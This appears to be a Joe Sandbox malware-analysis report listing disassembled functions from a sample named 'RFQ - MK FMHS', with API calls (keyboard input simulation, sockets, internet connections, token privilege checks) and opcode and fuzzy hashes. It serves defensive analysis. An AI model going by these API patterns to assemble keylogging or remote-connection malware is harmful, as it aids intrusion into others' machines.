                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID:
                    • API String ID: 314563124-0
                    • Opcode ID: 423e974e892c3d3a981c464986656cba94c26877cd8467102768ebf07dc40776
                    • Instruction ID: 980dffa56f629756cfd750c268a2b0cec5f0d2b22bd372c6a4c05feb1bcd997b
                    • Opcode Fuzzy Hash: 423e974e892c3d3a981c464986656cba94c26877cd8467102768ebf07dc40776
                    • Instruction Fuzzy Hash: A781E975A00109EFCB04DF94C984EEEB7B9FF89315F208598E555BB250DB72AE06CB60
                    Function 00EC6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: 9bc70d0ad78b67f09aade178559bd8da1c28a5426e7e84158c0b4d88ce665a41
                    • Instruction ID: 23519ea4c1c32eb1f78497f54d07248766ea45f6cbd1e7fa46aceaf320bb75de
                    • Opcode Fuzzy Hash: 9bc70d0ad78b67f09aade178559bd8da1c28a5426e7e84158c0b4d88ce665a41
                    • Instruction Fuzzy Hash: 825195317043019FDB24AF65D592F6AB3E5AF48310F20A81FF59AEB291DA719842DF11
                    Function 00EF9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(014C0CD0,?), ref: 00EF9AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 00EF9B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00EF9B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 763f592abac16e110050cbfefbe515f7246308cf03a88560bfe0bbb33e605247
                    • Instruction ID: 7a32a8e60ee112965ba3f5e739aebb694a94bf82966b94f16124f8b9e06f0804
                    • Opcode Fuzzy Hash: 763f592abac16e110050cbfefbe515f7246308cf03a88560bfe0bbb33e605247
                    • Instruction Fuzzy Hash: 59512C34A0060DAFCF24DF68D880ABE7BB6FF44324F149259FA55AB291D730AD41DB94
                    Function 00EE6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6CE4
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6CF4
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE6D58
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6D64
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: e05c87063e8cbdf04a892380268493f999dfa548ac4b8352a2266b3e1d5cccbe
                    • Instruction ID: 1bb7243fa7e3f233d9fd2791b57df5448071c6aa6f8ac91652820f157da7517e
                    • Opcode Fuzzy Hash: e05c87063e8cbdf04a892380268493f999dfa548ac4b8352a2266b3e1d5cccbe
                    • Instruction Fuzzy Hash: B0416B75740200AFEB20AF24DC86F3A76E5EF58B24F44D418FA59BB2D3DA719D008B91
                    Function 00EE672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00EFF910), ref: 00EE67BA
                    • _strlen.LIBCMT ref: 00EE67EC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: bfa6ae4bf68615363ca09e019f5a1e48d00e5880ef7dc9b2f77d8c5e34475420
                    • Instruction ID: a857e20bccfd2d53c3d0d3cefbf2034a9f6ebf2dc246940b3ad35960da8d1647
                    • Opcode Fuzzy Hash: bfa6ae4bf68615363ca09e019f5a1e48d00e5880ef7dc9b2f77d8c5e34475420
                    • Instruction Fuzzy Hash: EE41C631A00108AFCB14EBA5DCC1FAEB3E9EF54354F149169F919B7292DB70AD40CB94
                    Function 00EDBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EDBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 00EDBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EDBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EDBB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 3352155ef35fc98e5b9b70710137c508e6075ab4ea215de7a8cd4e44b11d5073
                    • Instruction ID: 86aa49b062124f245d8e2fe3a64ac685eaa050a770e7ac5d1be1f09fc7418964
                    • Opcode Fuzzy Hash: 3352155ef35fc98e5b9b70710137c508e6075ab4ea215de7a8cd4e44b11d5073
                    • Instruction Fuzzy Hash: 1C412539200610DFDF11EF15C584A5DBBE1EF89324B09D499E94AAB362CB34FD01CB91
                    Function 00EF8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EF8B4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: a6cfc9daaab3b2468eba46eb226be013742e474108dba3a16915c78b78faf0ff
                    • Instruction ID: d71fa721d142b883d813735ee044ef95e41be0dd037228fb5f6aca0d4844051b
                    • Opcode Fuzzy Hash: a6cfc9daaab3b2468eba46eb226be013742e474108dba3a16915c78b78faf0ff
                    • Instruction Fuzzy Hash: 0331C37860020CBEEF209F18CE59FB937A5EB05324F64A652FB55F62A1DE30AD40D751
                    Function 00EFADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00EFAE1A
                    • GetWindowRect.USER32(?,?), ref: 00EFAE90
                    • PtInRect.USER32(?,?,00EFC304), ref: 00EFAEA0
                    • MessageBeep.USER32(00000000), ref: 00EFAF11
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: decebcf7f8b65ff2e42530c415aee6a740b6236be86648fc2fa1c063a03cb7c5
                    • Instruction ID: bc1e532b06cdaa1c62ccd21030a7ba83f0f18c0f26c50abd12b76fed8e9057d2
                    • Opcode Fuzzy Hash: decebcf7f8b65ff2e42530c415aee6a740b6236be86648fc2fa1c063a03cb7c5
                    • Instruction Fuzzy Hash: 1B417AB560010DEFCB11CF58C884AA97BF5FF88354F1890B9E618EF251D730A882DB92
                    Function 00ED0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00ED1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00ED1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00ED10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00ED110B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 49acf5e04e4b3e67ac917e9c2eae214b1dc35bd77c2ce9c88af83e5fa76c981d
                    • Instruction ID: afc6c3b0af375125d776a87d17454126139125d5f6476929626c3646da73184c
                    • Opcode Fuzzy Hash: 49acf5e04e4b3e67ac917e9c2eae214b1dc35bd77c2ce9c88af83e5fa76c981d
                    • Instruction Fuzzy Hash: 97313B70E40688BEFB30AA658C05BF9BBA9EF45314F08629BE590723D1C3754DC69751
                    Function 00ED1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00ED1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00ED1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00ED11F1
                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00ED1243
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 317fe3cc99bf7b65ceae20adbba2c9621e1a51328d5a502e8faa2badf0493334
                    • Instruction ID: 5b7d5aca06f36eaba33d704ab92d21eeff32b327f76c3a1736c6b2cffede84f8
                    • Opcode Fuzzy Hash: 317fe3cc99bf7b65ceae20adbba2c9621e1a51328d5a502e8faa2badf0493334
                    • Instruction Fuzzy Hash: 85312B30941658BEEF308A658C047FEBBAAEB85314F04639BE590B23E1C3354956D751
                    Function 00EA6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EA644B
                    • __isleadbyte_l.LIBCMT ref: 00EA6479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: d89ec1ffdbb564f5c5c438bd5a73b83dce64f18941a6f4a14556ac9722f096a6
                    • Instruction ID: 7a9fd5dfb8c7974e9094022d84befd829e84b87d98160a20e7e789599dce6f10
                    • Opcode Fuzzy Hash: d89ec1ffdbb564f5c5c438bd5a73b83dce64f18941a6f4a14556ac9722f096a6
                    • Instruction Fuzzy Hash: 3B31DE31600246AFDF218F75C844BBA7BE9FF4F314F195069E864AB1A1EB31E850DB90
                    Function 00EF5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 00EF5189
                      • Part of subcall function 00ED387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ED3897
                      • Part of subcall function 00ED387D: GetCurrentThreadId.KERNEL32 ref: 00ED389E
                      • Part of subcall function 00ED387D: AttachThreadInput.USER32(00000000,?,00ED52A7), ref: 00ED38A5
                    • GetCaretPos.USER32(?), ref: 00EF519A
                    • ClientToScreen.USER32(00000000,?), ref: 00EF51D5
                    • GetForegroundWindow.USER32 ref: 00EF51DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 7328002ba56645c8fac3af58f4fce0d797d4e7c005e6939a4e10b9815634ad29
                    • Instruction ID: 64c93eb1a0fd2c2dba7dccfbc5ad5d119c159d34d922afe43d95a35406d2a77d
                    • Opcode Fuzzy Hash: 7328002ba56645c8fac3af58f4fce0d797d4e7c005e6939a4e10b9815634ad29
                    • Instruction Fuzzy Hash: 99310C72901108AFDB04EFA5C8859EFB7F9EF98300F10906AE515F7252EA759E05CBA1
                    Function 00EFC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • GetCursorPos.USER32(?), ref: 00EFC7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EABBFB,?,?,?,?,?), ref: 00EFC7D7
                    • GetCursorPos.USER32(?), ref: 00EFC824
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EABBFB,?,?,?), ref: 00EFC85E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: fc42499594ba4e0c1ccedbc739c396a3e8308bf62a0533941426ebe399e594fe
                    • Instruction ID: 466ffcb6a52cc7d55ecb3547a27d190996ef5a30557471dbca990ebdcf310f42
                    • Opcode Fuzzy Hash: fc42499594ba4e0c1ccedbc739c396a3e8308bf62a0533941426ebe399e594fe
                    • Instruction Fuzzy Hash: 5931713560005CAFCB15CF59C898EFA7BB6EF49364F248069FA05AB261C731AD50EB60
                    Function 00E90BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • __setmode.LIBCMT ref: 00E90BF2
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                    • _fprintf.LIBCMT ref: 00E90C29
                    • OutputDebugStringW.KERNEL32(?), ref: 00EC6331
                      • Part of subcall function 00E94CDA: _flsall.LIBCMT ref: 00E94CF3
                    • __setmode.LIBCMT ref: 00E90C5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: c2f448d0d28ca398795d23931d7291e2d81ae90d3a6bd1da6f428469a6adcb08
                    • Instruction ID: f4986c94511f50cac90c6a1834a87067a4a3c5ee19228429b6b156232ed49d9b
                    • Opcode Fuzzy Hash: c2f448d0d28ca398795d23931d7291e2d81ae90d3a6bd1da6f428469a6adcb08
                    • Instruction Fuzzy Hash: 391127B29042087EDF04B3B49C42DBEBBE9DF85320F14611AF108772D2DE615D479395
                    Function 00EC8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8669
                      • Part of subcall function 00EC8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8673
                      • Part of subcall function 00EC8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8682
                      • Part of subcall function 00EC8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8689
                      • Part of subcall function 00EC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EC8BEB
                    • _memcmp.LIBCMT ref: 00EC8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC8C44
                    • HeapFree.KERNEL32(00000000), ref: 00EC8C4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 2b4707893a1d2ee40101e5bbbf11f6f5c847618e33f36e2b52ac243cb8d11618
                    • Instruction ID: 8cf7e3e6f6d5772c81ab074cac21265e4f679f0415cfe5236c66d3d1a92c83b1
                    • Opcode Fuzzy Hash: 2b4707893a1d2ee40101e5bbbf11f6f5c847618e33f36e2b52ac243cb8d11618
                    • Instruction Fuzzy Hash: 87218972E02208AFCB00CFA4CB44FEEB7B8EF50345F044099E454B7241DB32AA06CB61
                    Function 00EE1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EE1A97
                      • Part of subcall function 00EE1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EE1B40
                      • Part of subcall function 00EE1B21: InternetCloseHandle.WININET(00000000), ref: 00EE1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 25172bf6bf734683b7fe02eea4a9d2fbe3141055afd5b2f6f01b9a1cfcb58194
                    • Instruction ID: 185d456bd715a15d2f5769c6638c5e3889e89623a03b266c119d5b459b802510
                    • Opcode Fuzzy Hash: 25172bf6bf734683b7fe02eea4a9d2fbe3141055afd5b2f6f01b9a1cfcb58194
                    • Instruction Fuzzy Hash: 84219235200649FFDB119F628C01FBAB7ADFF84701F10105EFA15A6690E771A855D790
                    Function 00ECE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule
                    APIs
